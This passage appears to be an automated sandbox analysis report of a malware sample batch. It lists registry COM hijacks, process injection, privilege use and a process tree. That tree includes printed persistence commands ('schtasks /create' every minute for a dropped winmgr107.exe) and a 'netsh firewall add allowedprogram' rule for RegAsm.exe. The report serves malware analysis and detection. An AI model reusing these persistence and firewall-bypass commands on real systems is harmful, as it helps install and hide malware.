\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Mqikidhq.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Bolbhp32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Cddjledl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Cfgaadad.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Gaemmgnl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Bmhcmmlg.dll" Jnjcjdin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Plijen32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Qiohdadi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Fpbmboeq.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32 Hdnbjk32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Qkpmac32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Fdhomnhk.dll" Dmkldm32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ = "C:\\Windows\\SysWow64\\Glbqeb32.dll" Hdcbpqom.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\ThreadingModel = "Apartment" Jhbdmm32.exe -
NTFS ADS 16 IoCs
Processes:
virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exewinmgr107.exewinmgr107.exewinmgr107.exewinmgr107.exewinmgr107.exewinmgr107.exewinmgr107.exewinmgr107.exewinmgr107.exewinmgr107.exewinmgr107.exewinmgr107.exewinmgr107.exewinmgr107.exewinmgr107.exedescription ioc Process File created C:\Users\Admin\Desktop\virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe:Zone.Identifier:$DATA virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe File created C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe File opened for modification C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe File opened for modification C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe File opened for modification C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe File opened for modification C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe File opened for modification C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe File opened for modification C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe File opened for modification C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe File opened for modification C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe File opened for modification C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe File opened for modification C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe File opened for modification C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe File opened for modification C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe File opened for modification C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe File opened for modification C:\ProgramData\winmgr107.exe:Zone.Identifier:$DATA winmgr107.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
vlc.exepid Process 4352 vlc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exevirussign.com_0a20b558065db2051bcbfa0cd7fe943f.exewinmgr107.exeRegAsm.exewinmgr107.exepowershell.exepid Process 216 msedge.exe 216 msedge.exe 2408 msedge.exe 2408 msedge.exe 3484 identity_helper.exe 3484 identity_helper.exe 1616 msedge.exe 1616 msedge.exe 1792 msedge.exe 1792 msedge.exe 1792 msedge.exe 1792 msedge.exe 1652 virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe 1652 virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe 4508 winmgr107.exe 4508 winmgr107.exe 4508 winmgr107.exe 4508 winmgr107.exe 4508 winmgr107.exe 4508 winmgr107.exe 4508 winmgr107.exe 4508 winmgr107.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4508 winmgr107.exe 4508 winmgr107.exe 5056 winmgr107.exe 5056 winmgr107.exe 4508 winmgr107.exe 4508 winmgr107.exe 4508 winmgr107.exe 4508 winmgr107.exe 5092 powershell.exe 5092 powershell.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe 4248 RegAsm.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
Processes:
7zFM.exeOpenWith.exevlc.exeRegAsm.exepid Process 1588 7zFM.exe 4768 OpenWith.exe 4352 vlc.exe 4248 RegAsm.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid Process 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zFM.exeRegAsm.exepowershell.exevirussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execsrss.exesc.exedescription pid Process Token: SeRestorePrivilege 1588 7zFM.exe Token: 35 1588 7zFM.exe Token: SeSecurityPrivilege 1588 7zFM.exe Token: SeSecurityPrivilege 1588 7zFM.exe Token: SeSecurityPrivilege 1588 7zFM.exe Token: SeSecurityPrivilege 1588 7zFM.exe Token: SeDebugPrivilege 4248 RegAsm.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: SeSecurityPrivilege 1588 7zFM.exe Token: SeDebugPrivilege 5092 powershell.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: SeDebugPrivilege 2208 virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Token: SeImpersonatePrivilege 2208 virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: SeDebugPrivilege 4672 powershell.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeDebugPrivilege 2224 powershell.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: SeDebugPrivilege 2300 powershell.exe Token: SeSecurityPrivilege 1588 7zFM.exe Token: SeDebugPrivilege 3548 powershell.exe Token: SeDebugPrivilege 4972 powershell.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: SeSystemEnvironmentPrivilege 1596 csrss.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: SeSecurityPrivilege 4660 sc.exe Token: SeSecurityPrivilege 4660 sc.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: SeSecurityPrivilege 1588 7zFM.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: SeSecurityPrivilege 1588 7zFM.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: SeSecurityPrivilege 1588 7zFM.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe Token: 33 4248 RegAsm.exe Token: SeIncBasePriorityPrivilege 4248 RegAsm.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exepid Process 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe -
Suspicious use of SendNotifyMessage 33 IoCs
Processes:
msedge.exevlc.exepid Process 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 2408 msedge.exe 4352 vlc.exe 4352 vlc.exe 4352 vlc.exe 4352 vlc.exe 4352 vlc.exe 4352 vlc.exe 4352 vlc.exe 4352 vlc.exe 4352 vlc.exe -
Suspicious use of SetWindowsHookEx 20 IoCs
Processes:
OpenWith.exevlc.exevirussign.com_1e903a364fd4c0d461993bc1db029e4b.exevirussign.com_7a14384c52b18fe49305121250840bff.exepid Process 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4768 OpenWith.exe 4352 vlc.exe 11256 virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe 740 virussign.com_7a14384c52b18fe49305121250840bff.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid Process procid_target PID 2408 wrote to memory of 3720 2408 msedge.exe 82 PID 2408 wrote to memory of 3720 2408 msedge.exe 82 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 2140 2408 msedge.exe 83 PID 2408 wrote to memory of 216 2408 msedge.exe 84 PID 2408 wrote to memory of 216 2408 msedge.exe 84 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 PID 2408 wrote to memory of 4996 2408 msedge.exe 85 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://samples.vx-underground.org/tmp/Virussign.2024.05.16.7z1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe875746f8,0x7ffe87574708,0x7ffe875747182⤵PID:3720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:22⤵PID:2140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:82⤵PID:4996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:12⤵PID:3532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:12⤵PID:5036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 /prefetch:82⤵PID:732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:12⤵PID:4168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:12⤵PID:4004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:12⤵PID:4780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:12⤵PID:3624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3756 /prefetch:82⤵PID:2768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:12⤵PID:4308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5532 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,11253446263579555619,6340664532331257585,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1792
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2040
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3908
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2228
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Virussign.2024.05.16.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4768 -
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\virussign.com_0a20b558065db2051bcbfa0cd7fe943f.vir"2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4352
-
-
C:\Users\Admin\Desktop\virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe"C:\Users\Admin\Desktop\virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:1652 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start C:\PROGRA~3\VIRUSS~1.TXT2⤵
- Checks computer location settings
PID:452 -
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\PROGRA~3\virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe.txt3⤵PID:3748
-
-
-
C:\ProgramData\winmgr107.exeC:\ProgramData\winmgr107.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4508 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe03⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4248 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:2504
-
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:2064
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:2304
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:1088
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:4308
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:3680
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:2848
-
-
